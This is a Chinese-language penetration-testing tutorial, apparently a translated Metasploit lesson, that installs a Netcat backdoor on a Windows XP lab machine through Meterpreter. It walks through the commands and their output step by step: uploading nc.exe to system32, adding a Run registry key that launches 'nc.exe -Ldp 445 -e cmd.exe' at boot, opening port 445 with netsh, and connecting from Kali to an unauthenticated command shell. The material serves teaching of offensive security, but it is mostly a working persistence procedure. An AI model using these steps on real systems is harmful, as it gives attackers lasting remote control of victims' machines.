seo优化_前端开发_渗透技术在此示例中,我们将安装Netcat后门,而不是在远程系统上查找信息。这包括对系统注册表和防火墙的更改。
首先,我们必须将Netcat的副本上载到远程系统。
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 [*] uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32 [*] uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32nc.exe
之后,我们与注册表一起工作,以使netcat在启动时执行并在端口445上进行监听。我们通过编辑键“ HKLM \ software \ microsoft \ windows \ currentversion \ run”来执行此操作。
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
Enumerating: HKLM\software\microsoft\windows\currentversion\run
Values (3):
VMware Tools
VMware User Process
quicktftpserver
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'
Successful set nc.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: nc
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
接下来,我们需要更改系统以允许通过防火墙到Netcat后门的远程连接。我们打开一个交互式命令提示符,并使用netsh命令进行更改,因为它比直接更改注册表要容易出错得多。另外,显示的过程应该在更多版本的Windows上都可以使用,因为注册表位置和功能高度依赖版本和补丁程序级别。
meterpreter > execute -f cmd -i Process 1604 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode Netsh firewall show opmode Domain profile configuration: ------------------------------------------------------------------- Operational mode = Enable Exception mode = Enable Standard profile configuration (current): ------------------------------------------------------------------- Operational mode = Enable Exception mode = Enable Local Area Connection firewall configuration: ------------------------------------------------------------------- Operational mode = Enable
我们在防火墙中打开端口445,并仔细检查它的设置是否正确。
C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL Ok. C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening netsh firewall show portopening Port configuration for Domain profile: Port Protocol Mode Name ------------------------------------------------------------------- 139 TCP Enable NetBIOS Session Service 445 TCP Enable SMB over TCP 137 UDP Enable NetBIOS Name Service 138 UDP Enable NetBIOS Datagram Service Port configuration for Standard profile: Port Protocol Mode Name ------------------------------------------------------------------- 445 TCP Enable Service Firewall 139 TCP Enable NetBIOS Session Service 445 TCP Enable SMB over TCP 137 UDP Enable NetBIOS Name Service 138 UDP Enable NetBIOS Datagram Service C:\Documents and Settings\Jim\My Documents >
这样,完成后,我们将重新启动远程系统并测试Netcat Shell。
root@kali:~# nc -v 172.16.104.128 445 172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [172.16.104.128] 445 (?) open Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Jim > dir dir Volume in drive C has no label. Volume Serial Number is E423-E726 Directory of C:\Documents and Settings\Jim 05/03/2009 01:43 AM . 05/03/2009 01:43 AM .. 05/03/2009 01:26 AM 0 ;i 05/12/2009 10:53 PM Desktop 10/29/2008 05:55 PM Favorites 05/12/2009 10:53 PM My Documents 05/03/2009 01:43 AM 0 QCY 10/29/2008 03:51 AM Start Menu 05/03/2009 01:25 AM 0 talltelnet.log 05/03/2009 01:25 AM 0 talltftp.log 4 File(s) 0 bytes 6 Dir(s) 35,540,791,296 bytes free C:\Documents and Settings\Jim >
在现实世界中,我们不会使用没有身份验证或加密的简单后门,但是此过程的原理对于系统的其他更改仍然相同,并且可能需要执行其他类型的程序在启动时。
